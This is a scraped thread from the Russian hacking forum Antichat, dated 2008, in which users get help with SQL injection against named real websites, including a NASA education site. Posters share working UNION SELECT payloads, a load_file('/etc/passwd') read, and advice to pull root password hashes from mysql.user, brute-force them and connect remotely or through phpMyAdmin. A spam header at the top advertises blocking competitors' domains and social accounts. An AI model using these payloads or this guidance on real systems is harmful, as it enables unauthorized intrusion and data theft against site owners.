УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 205 из 1393

205

Опции темы

Поиск в этой теме

Опции просмотра

#2041

24.05.2008, 00:02

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

у тебя file_priv нету, ибо

Цитата:

если в выводимое поле (любое) ввести load_file('/etc/passwd') равно как и load_file(0x2f6574632f706173737764) , то это поле просто пропадает, остальные остаются

проверить есть или нет попробовав прочитать любой файл, что ты и попробовал сделать выше
Так же инфа о наличии файл прив хранится в таблице mysql.user

Полный путь можно узнать например в гугле, вообще тут есть об этом статься от [cash]'a, ищи
В чар переводить - не сработает. Ты вместо имён таблиц увидишь "table_name"

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#2042

24.05.2008, 00:04

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

andreipup, там двиг - ворд пресс
https://forum.antichat.ru/threadnav50572-1-40.html

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#2043

24.05.2008, 01:35

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Так, У Велли проблема : ).Нашёл один проект,вскрыл,через schema_name узнал количество баз.Потом узнал,что на нём хостицо не один сайт

,а когда потался вывести все те таблицы,что были в этой базе,в других базах не прокатило.).Есть ли какой-то вариант получения доступа к ним ?. о_О, и запрос если можно, как должно быть в идеале: )

Последний раз редактировалось Велемир; 24.05.2008 в 01:39..

#2044

24.05.2008, 01:46

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

видимо у юзера от кторого работает мускул нет прав на другие базы
если есть доступ к mysql.user, выбирай оттуда пасс рута, бруть
Когда сбрутишь или пробуй удалённо приконектиться к серваку или ищи на сайтах пшпмайадмин

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#2045

24.05.2008, 03:25

1SeTh

Участник форума

Регистрация: 17.02.2006

Сообщений: 189

Провел на форуме:
2406659

Репутация: 34

никак не могу подобрать колонну для этой страницы

Цитата:

http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,???+from+mx_page/*

#2046

24.05.2008, 11:14

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от 1SeTh

никак не могу подобрать колонну для этой страницы

В чём проблема то? Вывод есть:
http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--

__________________
..

#2047

24.05.2008, 11:49

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Цитата:

Сообщение от Spyder

Жалко....доступ туда закрыт

.Остаёццо только расхешить.Ммм...Или подделать ид сессии

*Ушёл искать скрипты*.

#2048

24.05.2008, 13:21

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от .Slip

В чём проблема то? Вывод есть:
http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--

Вот так ещё лучше:
_http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,null/*
Вывод в <title> ,хотя, кому как удобнее

#2049

24.05.2008, 14:11

†c0(aIn?†

Новичок

Регистрация: 04.05.2008

Сообщений: 16

Провел на форуме:
209786

Репутация: 45

Цитата:

http://www.fondationbrigittebardot.fr/site/actu_en.php?id=

Нашел уязвимость...но бд ведет себя странно...
1.пробую group by , всё норм, 3 колонки...
2.пробую union select 1,2,3/* появляется ошибка...

Цитата:

The used SELECT statements have a different number of columns

Подскажите,плз)

#2050

24.05.2008, 14:49

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=2'+or+1=(select+table_n ame+from+information_schema.tables+limit+1,1)/*

Почему-то не эксплотируеццо,в лимитки подставляю любое число,то же самое.Что неправильно ? И вывода кстати нету)(